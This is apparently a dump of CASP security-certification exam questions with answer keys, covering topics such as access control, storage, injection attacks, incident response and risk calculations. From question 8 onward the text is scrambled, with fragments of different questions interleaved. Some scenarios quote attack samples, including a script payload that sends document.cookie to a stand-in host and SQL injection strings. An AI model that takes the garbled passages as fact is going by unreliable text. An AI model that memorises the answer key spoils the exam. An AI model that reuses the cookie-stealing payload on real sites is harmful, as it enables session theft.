You are on page 1of 239

CASP 002 2016

Number: 000-000
Passing Score: 800
Time Limit: 120 min
File Version: 1.0

Exam name: CompTIA Advanced Security Practitioner (CASP) Exam

Sections
1. Enterprise Security
2. Risk Management and Incident Response
3. Research and Analysis
4. Integration of Computing, Communications and Business Disciplines
5. Technical Integration of Enterprise Components
6. Mixed Questions

Экзамен A

QUESTION 1
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions.
Which of the following would BEST accomplish this?

A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS

Correct Answer: B
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 2
Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to
buying a new SAN?

A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter

Correct Answer: B
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 3
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the
highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?

A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM

Correct Answer: A
Section: Enterprise Security

Explanation

Explanation/Reference:

QUESTION 4
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g.
antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules
on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM
B. HSM
C. TPM
D. INE

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 5
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and
logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?

A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 6
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following
piece of code used by a web based shopping cart.

SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);

The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is
generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM- DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the
price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items?

A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking

Correct Answer: C
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 7
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so
the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially
occur?

A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 8
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution
in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST
describes the application issue?

A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation

Correct Answer: E
Section: Enterprise Security
Explanation

Disable the switch port and block the 2001::/32 traffic at the firewall Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 11 A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request. WAF B. The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. would be the MOST effective in protecting the fields from malformed input? A.Explanation/Reference: QUESTION 9 A developer is determining the best way to improve security within the code being developed. The network administrator confirms there is no IPv6 routing into or out of the network. Input validation C.cookie</script>') + "'. Remove the system from the network and disable IPv6 at the router C. SIEM . The developer is focusing on input fields where customers enter their credit card details. Encrypting credit card details D. Investigate the network traffic and block UDP port 3544 at the firewall B. Stored procedure C.getParameter('><script>document. Which of the following is the BEST course of action? A. Which of the following techniques. if implemented in the code.com/? q='document. Regular expression matching Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 10 A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. Locate and remove the unauthorized 6to4 relay from the network D. Client side input validation B.location='http://badsite. Which of the following should the security administrator implement to prevent this particular attack? A.

Ensure each server has two HBAs connected through two routes to the NAS. Sandboxing E.D. B. Which of the following options increases data availability in the event of a datacenter failure? A. To virtual machines. which of the following trusted system concepts can be implemented? A. D. C. Which of the following is the MOST comprehensive way to resolve the issue? . and created a backup datacenter as a mitigation strategy. By implementing virtualized TPMs. Software-based root of trust B.000 systems is vulnerable to a buffer overflow attack. Chain of trust with a hardware root of trust D. Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 14 An application present on the majority of an organization's 1. this virtual hardware is indistinguishable from real hardware. Establish deduplication across diverse storage paths. Software-based trust anchor with no root of trust Correct Answer: C Section: Enterprise Security Explanation Explanation/Reference: QUESTION 13 An organization is concerned with potential data loss in the event of a disaster. Establish a SAN that replicates between datacenters. The current storage method is a single NAS used by all servers in both datacenters. Replicate NAS changes to the tape backups at the other datacenter. DAM Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 12 A popular commercial virtualization platform allows for the creation of virtual hardware. Continuous chain of trust C.

firstname. Privilege escalation. Knowing this. Cross-site scripting D. CSRF. Fault injection. Deploy custom HIPS signatures to detect and block the attacks. Privilege escalation D. B. Application DoS. Buffer overflow C.A. Memory leaks Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: . SQL injection. lastname from authors User input= firstname= Hack.man lastname=Johnson Which of the following types of attacks is the user attempting? A. Correct Answer: B Section: Enterprise Security Explanation Explanation/Reference: QUESTION 15 select id. Command injection C. Deploy custom NIPS signatures to detect and block the attacks. Run the application in terminal services to reduce the threat landscape. C. D. Insecure direct object references. XML injection B. SQL injection Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 16 A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Smurf B. CSRF. which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important? A. Validate and deploy the appropriate patch. Resource exhaustion.

Booting all the lab desktops at the same time is creating excessive I/O.51.51. can natively integrate with AD. G.23 port 37918 ssh2 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198. A backup is running on the thin clients at 9am every morning. E.QUESTION 17 A security administrator wants to deploy a dedicated storage solution which is inexpensive. Virtual storage Correct Answer: B Section: Enterprise Security Explanation Explanation/Reference: QUESTION 18 At 9:00 am each morning. after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Add guests with more memory to increase capacity of the infrastructure.51. allows files to be selectively encrypted and is suitable for a small number of users at a satellite office.100. The outage lasts for around 10 minutes.23 port 37915 ssh2 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198. The lab desktops are saturating the network while booting. NAS C. C. SAN B.100.100.51. A. F.23 port 37920 ssh2 . D. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO). Install 10-Gb uplinks between the hosts and the lab to increase network capacity.23 port 37916 ssh2 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198. Which of the following would BEST meet the requirement? A.100. Virtual SAN D. H. B. all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive.100. Correct Answer: DF Section: Enterprise Security Explanation Explanation/Reference: QUESTION 19 A security administrator is shown the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198. The lab desktops are using more memory than is available to the host systems. Install faster SSD drives in the storage system used in the infrastructure.23 port 37914 ssh2 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51. Install more memory in the thin clients to handle the increased load while booting.

23. D. F. C. E. Isolate the system immediately and begin forensic analysis on the host. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO). A full-system backup should be implemented to a third-party provider with strong encryption for data in transit. Change the root password immediately to a password not found in a dictionary. G.51. Correct Answer: BD Section: Enterprise Security Explanation Explanation/Reference: QUESTION 21 A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen.2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198. H. A DLP gateway should be installed at the company border. B.62.php?user=admin&pass=pass%20or %201=1 HTTP/1. D. An authorized administrator has logged into the root account remotely. Strong authentication should be implemented via external biometric devices. F. and that only a 6-digit PIN is entered in the password field.11 . A security administrator is concerned with the following web server log: 10. The administrator should disable remote root logins. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Split-tunnel VPN should be enforced when transferring sensitive data. A. A remote attacker has guessed the root password using a dictionary attack. The code ensures that only the upper case and lower case letters are entered in the username field.100. A remote attacker has compromised the private key of the root account. B. Use iptables to immediately DROP connections from the IP 198. Full-drive file hashing should be implemented with hashes stored on separate storage.23 port 37924 ssh2 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).235. E. C.[02/Mar/2014:06:13:04] "GET /site/script. Correct Answer: CE Section: Enterprise Security Explanation Explanation/Reference: QUESTION 20 A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network.51.1" 200 5724 . A. A remote attacker has compromised the root account using a buffer overflow in sshd.100. Full-tunnel VPN should be required for all network communication.

C.165.bash_history HTTP/1.25 root root 4096 Mar 8 09:30 .40 . Correct Answer: C Section: Enterprise Security Explanation Explanation/Reference: QUESTION 22 The security administrator finds unauthorized tables and records.. -rws-----. The security administrator is concerned with XSS..76./.76.165. SQL injection D.php?create%20table%20hidden HTTP/1. The security administrator is concerned that someone may log on as the administrator.1" 200 5724 90. drwxr-xr-x 25 root root 4096 Mar 8 09:30 . which were not present before.ssh Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO). ensure the following characters are sanitized: <> F. Set an account lockout policy Correct Answer: AF Section: Enterprise Security Explanation Explanation/Reference: . B. D.[08/Mar/2014:10:54:04] "GET index./root/. Update crontab with: find / \( -perm -4000 \) type f print0 | xargs -0 ls l | email. Implement the following PHP directive: $clean_user_input = addslashes($user_input) H. Brute force attack C. A.bash_history -rw------./. on a Linux database server.bash_history -rw------.25 root root 4096 Mar 8 09:30 . The security administrator is concerned with nonprintable characters being used to gain administrative access. Using input validation.[08/Mar/2014:10:54:04] "GET calendar.40 . which of the following is the security administrator concerned with and which fix should be implemented by the developer? A.76. and the developer should implement server side input validation.. Privilege escalation B.1" 200 5724 90.sh G.25 root root 4096 Mar 8 09:30 .profile -rw------.165.. Cross-site scripting E. which connects to the database server via an account with SELECT only privileges. The database server communicates only with one web server.40 . Web server logs show the following: 90. and the developer should ensure strong passwords are enforced.php?user=<script>Create</ script> HTTP/1.[08/Mar/2014:10:54:05] "GET . and the developer should normalize Unicode characters on the browser side. The security administrator is concerned with SQL injection. and the developer should strip all nonprintable characters.Given this log.1" 200 5724 The security administrator also inspects the following file system locations on the database server using the command `ls -al /root' drwxrwxrwx 11 root root 4096 Sep 28 22:45 .25 root root 4096 Mar 8 09:30 .

and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Perform a network penetration test D. Review switch and router configurations B.QUESTION 23 The risk manager has requested a security solution that is centrally managed. DLP Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 24 Which of the following describes a risk and mitigation associated with cloud data storage? A. HIPS B. Antivirus D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 25 An insurance company is looking to purchase a smaller company in another country. Review the firewall rule set and IPS logs . Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. UTM C. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Review the security policies and standards C. Risk: Offsite replication Mitigation: Multi-site backups C. can easily be updated. Which of the following would BEST meet this requirement? A. NIPS E. Which of the following tasks would the security administrator perform as part of the security due diligence? A.

interoperability agreement issues and regulatory issues C.000. Validating the integrity of the deduplicated data D. The Business Operations department has determined the loss associated to each attack is $40. Cultural differences. After implementing application caching. Determining how to install HIPS across all server platforms to prevent future incidents B.000. Geographical regulation issues. the number of DoS attacks was reduced to one time a year. Improper handling of customer data.Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 26 A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives. loss of intellectual property and reputation damage Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 28 A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Restoring the data will be difficult without the application configuration Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 27 The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. the company finds that all backup tapes for this server are also corrupt. increased cost of doing business and divestiture issues D. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Based on heuristic information from the Security Operations Center (SOC). Which of the following is the PRIMARY concern? A. loss of intellectual property and interoperability agreement issues B. During the incident response. testing. The cost of the countermeasures was $100. Which of the following is the monetary value earned during the first year of operation? . software development and back office functions that deal with the processing of customer data. Preventing the ransomware from re-infecting the server upon restore C. Functions to be outsourced include: business analysts. Improper handling of client data. a Denial of Service Attack (DoS) has been successfully executed 5 times a year.

D. C.000 B. B. Which of the following should the CIO recommend to the finance director to minimize financial loss? A. the company will be unable to implement the requirement for the next two years. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2. The company should mitigate the risk. the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system.000 Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 29 The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Industry best practices with respect to the technical implementation of the current controls. The company should avoid the risk. Upon review.A. G. A revised DRP and COOP plan to the exception form. $200. C. nor does it allow for the purchase of additional compensating controls. The company should accept the risk. Risks associated with the inability to implement the requirements.000 C. E. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Business or technical justification for not implementing the requirements. the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. Correct Answer: ABG Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 30 The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation.3 million.000 D. The company should transfer the risk. $100. $140. Additionally. . B. A. Which of the following are MOST important to include when submitting the exception form? (Select THREE). D. F. Current and planned controls to mitigate the risks. $60. All sections of the policy that may justify non-implementation of the requirements. Internal procedures that may justify a budget submission to implement the new requirement. Due to budget constraints. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure.

an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Ensure the SaaS provider supports encrypted password transmission and storage. B. C. Ensure the SaaS provider supports secure hash file exchange. Ensure the SaaS provider supports directory services federation. procedures and relevant hosting certifications. Penetration testing of the solution to ensure that the customer data is well protected. Correct Answer: E Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 33 After a security incident. Physical penetration test of the datacenter to ensure there are appropriate controls. Ensure the SaaS provider supports role-based access control. E. C. It will host the entire organization's customer database. Review of the organizations security policies. E. A. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). Code review of the solution to ensure that there are no back doors located in the software. Security clauses are implemented into the contract such as the right to audit. D. D. in house Customer Resource Management (CRM) application.Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 31 A company is in the process of outsourcing its customer relationship management system to a cloud provider. Which of the following ensures the organization mitigates the risk of managing separate user credentials? A. Correct Answer: CD Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 32 An organization is selecting a SaaS provider to replace its legacy. Ensure the SaaS provider supports dual factor authentication. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? . The database will be accessed by both the company's users and its customers. B.

During the Lessons Learned phase C. In which part of the incident response phase would this be addressed in a controlled and productive manner? A. One vendor will be providing authentication services for its payment card service. and the other vendor will be providing maintenance to the service provider infrastructure sites. Least privilege B. During the Containment Phase D. Mandatory vacation D. Operating Level Agreement Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: . Non-Disclosure Agreement D.A. During the Preparation Phase Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 35 A security manager for a service provider has approved two vendors for connections to the service provider backbone. there were multiple attempts to assign blame for whose fault it was that the incident occurred. Separation of duties Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 34 A large organization has recently suffered a massive credit card breach. Memorandum of Agreement B. During the months of Incident Response. Job rotation C. During the Identification Phase B. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship? A. Interconnection Security Agreement C.

Risk Likelihood x Annual Loss Expectancy (ALE) Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 38 A security policy states that all applications on the network must have a password length of eight characters. Which of the following tools can BEST meet the CISO's requirement? A. GRC B. CMDB D.QUESTION 36 A large enterprise acquires another company which uses antivirus from a different vendor. IDS Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 37 Which of the following provides the BEST risk calculation methodology? A. and two are not expected to be upgraded or removed from the network. Provide a business justification for a risk exception Correct Answer: D Section: Risk Management and Incident Response . Impact x Threat x Vulnerability D. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Potential Loss x Event Probability x Control Failure Probability C. Provide a business justification to avoid the risk D. Inherit the risk for six months C. Establish a risk matrix B. One system will be upgraded in six months. There are three legacy applications on the network that cannot meet this policy. IPS C. Syslog-ng E. Which of the following processes should be followed? A. Annual Loss Expectancy (ALE) x Value of Asset B.

where each virtual instance is managed by a separate administrator and logging to the same hardware. A SaaS based firewall which logs to the company's local storage via SSL. B. and is managed by the change control team. Which of the following risk strategies did the CISO implement? . A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud. E. Which of the following designs BEST supports the given requirements? A. Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 40 A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. C. B.Explanation Explanation/Reference: QUESTION 39 The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. C. and realizes this is a risk to the company. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. D. A virtualized firewall. In response. the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Privacy could be compromised as patient records can be viewed in uncontrolled areas. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. Correct Answer: AD Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 41 The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage. Device encryption has not been enabled and will result in a greater likelihood of data loss. Which of the following are of MOST concern? (Select TWO). the doctors and specialists can interact with the hospital's system. A. and support incident reconstruction. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator. The DMZ design must support security in depth. Using a remote desktop type interface. change management and configuration processes. The patient records management system can be accessed from the guest network and requires two factor authentication. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. D.

The time stamp of the malware in the swap file. Mitigate D. Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: . B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. C. which of the following helps to determine when the system became infected? A. Employees are more likely to be using personal computers for general web browsing when they are at home. Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 43 The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter.A. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? A. B. The malware file's modify. so the risk at work is no different. Accept C. The timeline analysis of the file system. Transfer Correct Answer: C Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 42 A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. D. The corporate network is the only network that is audited by regulators and customers. Home networks are unknown to attackers and less likely to be targeted directly. The date/time stamp of the malware detection in the antivirus logs. Avoid B. change time properties. The CEO argues that the company cannot protect its employees at home. access. C. After creating an image and determining the directory location of the malware file. D.

B. Which of the following methods would BEST help with this process? (Select TWO). A. Ask desktop support if any changes to the images were made. D. Which of the following should be components of that meeting? (Select TWO). The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Discussion of event timeline E.QUESTION 44 A security officer is leading a lessons learned meeting. Calculate a new hash and compare it with the previously captured image hash. A. Parse all images to determine if extra data is hidden using steganography. C. Which of the following practices satisfy continuous monitoring of authorized information systems? A. Risk assessment D. Assigning of follow up items Correct Answer: DE Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 45 An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Ongoing authorization Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 46 The source workstation image for new accounting PCs has begun blue-screening. Calculate the ALE for the event D. Retrieve source system image from backup and run file comparison analysis on the two images. Demonstration of IPS system B. E. A technician notices that the date/time stamp of the image source appears to have changed. Review vendor selection process C. Correct Answer: AC . Security test and evaluation C. Check key system files to see if date/time stamp is in the past six months. Independent verification and validation B.

D. Develop an information classification scheme that will properly secure data on corporate systems. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption. an administrative control B. . The organization has not addressed telecommuting in the past. Which of the following steps must the committee take FIRST to outline senior management's directives? A. collusion Correct Answer: C Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 48 The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. Correct Answer: C Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 49 A company is facing penalties for failing to effectively comply with e-discovery requests. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. This requirement is BEST described as an implementation of: A. Publish a policy that addresses the security requirements for working remotely with company equipment. least privilege E. Work with mid-level managers to identify and document the proper procedures for telecommuting. Which of the following could reduce the overall risk to the company from this issue? A. dual control C. B. C. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment. separation of duties D.Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 47 A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges.

Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.34 percent D. Grey box testing D. Require each user to log passwords used for file encryption to a decentralized repository. One of these situations was a two hour scheduled maintenance time.72 percent Correct Answer: C Section: Research and Analysis Explanation Explanation/Reference: QUESTION 51 A security firm is writing a response to an RFP from a customer that is building a new network based software product.24 percent B. it does not specify any particular method to achieve this goal. 92. which of the following calculations is the percentage of uptime assuming there were 722 hours in the month? A. aimed at improving the stability of the WAF. 98. however. C. White box testing Correct Answer: AE Section: Research and Analysis Explanation Explanation/Reference: . System logs show that the WAF has been unavailable for 14 hours over the past month. A security engineer has found the WAF to be the root cause of the failures. The firm's expertise is in penetration testing corporate networks.06 percent C. A. Code review B. The RFP explicitly calls for all possible behaviors of the product to be tested. Permit users to only encrypt individual files using their domain password and archive all old user passwords. Code signing E. Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 50 There have been some failures of the company's internal facing website.B. 99. D. Using the MTTR based on the last month's performance figures. Which of the following should be used to ensure the security and functionality of the product? (Select TWO). in four separate situations. Penetration testing C. 98.

19 > 128.31. length 1400 11:16:22.20. an ACL should be placed on the company's external router to block incoming UDP port 19 traffic. Correct Answer: A Section: Research and Analysis Explanation Explanation/Reference: .112.19 > 128.213.132. length 1400 11:16:22. C.176.19: UDP.110402 IP 70.19: 11:16:22. and employees in the office are unable to browse the Internet.19.27.QUESTION 52 Company XYZ has purchased and is now deploying a new HTML5 application. length 1400 11:16:22.201.19 > 128.237. The senior security engineer starts by reviewing the bandwidth at the border router.20. The company wants to hire a penetration tester to evaluate the security of the client and server components of the proprietary web application before launch. B.19 > 128. After the senior engineer used a network analyzer to identify an active Fraggle attack.55.110358 IP 192. After the senior engineer used a mirror port to capture the ongoing amplification attack. D. a BGP sinkhole should be configured to drop traffic at the source networks.7.20. The security engineer then inspects the following piece of log to try and determine the reason for the downtime.176. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack. Local proxy D. and notices that the incoming bandwidth on the router's external interface is maxed out. Which of the following is the penetration tester MOST likely to use while performing black box testing of the security of the company's purchased application? (Select TWO).200.176. an IPS filter should be enabled to block the attack and restore communication.176.19.2.176.110406 IP 112.19.19.20.176.19: UDP. length 1400 Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration? A. focusing on the company's external router's IP which is 128. Sandbox C. Code review B. Fuzzer E.110351 IP 23.200.19: UDP.27.19: UDP.19 > 128.192.19. Port scanner Correct Answer: CD Section: Research and Analysis Explanation Explanation/Reference: QUESTION 53 The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible. the company's ISP should be contacted and instructed to block the malicious packets.39.110343 IP 90.20.19: UDP. length 1400 11:16:22.20. After the senior engineer used a packet capture to identify an active Smurf attack. A.

without impacting the integrity of any of the systems? A. Use the existing access to change the password D. would be publicly embarrassing. Notify customers when services they run are involved in an attack. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization's other systems. Scan the ISP's customer networks using an up-to-date vulnerability scanner. Contract and configure scrubbing services with third-party DDoS mitigation providers. B. E.QUESTION 54 An external penetration tester compromised one of the client organization's authentication servers and retrieved the password database. Correct Answer: DE . Correct Answer: C Section: Research and Analysis Explanation Explanation/Reference: QUESTION 56 The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Purchase additional bandwidth from the company's Internet service provider. D. Use the pass the hash technique B. An outage. B. Which of the following would MOST appropriately address Joe's concerns? A. Use rainbow tables to crack the passwords C. C. D. A. so Joe. the Chief Executive Officer (CEO). C. Block traffic from the ISP's networks destined for blacklisted IPs. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP. Use social engineering to obtain the actual password Correct Answer: A Section: Research and Analysis Explanation Explanation/Reference: QUESTION 55 A web services company is planning a one-time high-profile event to be hosted on the corporate website. due to an attack. has requested that his security engineers put temporary preventive controls in place. Ensure web services hosting the event use TCP cookies and deny_hosts. Which of the following should the ISP implement? (Select TWO). Block traffic with an IP source not allocated to customers from exiting the ISP's network. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions.

Windows C.Section: Research and Analysis Explanation Explanation/Reference: QUESTION 57 Due to compliance regulations. Using documentation provided to them. The results will show an in-depth view of the network and should help pin-point areas of internal weakness. C. D. Solaris D. OSX Correct Answer: C Section: Research and Analysis Explanation . a systems engineer. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. she runs the following nmap command string: user@hostname:~$ sudo nmap O 192. To begin her investigative work. nmap is unable to identify the OS running on the node. B. the pen-test organization can quickly determine areas to focus on.168. a company requires a yearly penetration test. The risk of unplanned server outages is reduced. The results should reflect what attackers may be able to learn about the company.1. is working to identify an unknown node on the corporate network. but the following ports are open on the device: TCP/22 TCP/111 TCP/512-514 TCP/2049 TCP/32778 Based on this information. Which of the following would be the advantage of conducting this kind of penetration test? A. Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 58 Ann. which of the following operating systems is MOST likely running on the unknown node? A.54 Based on the output. Linux B.

D. Subscribe to security mailing lists C. Correct Answer: B Section: Research and Analysis Explanation Explanation/Reference: QUESTION 61 News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. Social media is an ineffective solution because the policy may not align with the business. . C. configure all layer 3 switches to feed data to the IDS for more effective monitoring. B. push technology. while maintaining a secure business environment. Social media is an ineffective solution because it is not primarily intended for business applications. After the initial exploit. Remove local admin permissions from all users and change anti-virus to a cloud aware. The company needs an effective communication solution to remain in constant contact with each other. Deploy a network based heuristic IDS. network mapping and fingerprinting is conducted to prepare for further exploitation. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection. The data exfiltration is enabled by malware on a compromised computer. Update company policies and procedures B. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Social media is an effective solution because it implements SSL encryption. C. B. D. Implement an application whitelist at all levels of the organization. Implement security awareness training D. Which of the following is the MOST effective solution to protect against unrecognized malware infections? A. Which of the following decisions is BEST for the CEO to make? A. Which of the following is a way to stay current on exploits and information security news? A. Ensure that the organization vulnerability management plan is up-to-date Correct Answer: B Section: Research and Analysis Explanation Explanation/Reference: QUESTION 60 The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. Social media is an effective solution because it is easily adaptable to new situations.Explanation/Reference: QUESTION 59 A security engineer is responsible for monitoring company applications for known vulnerabilities.

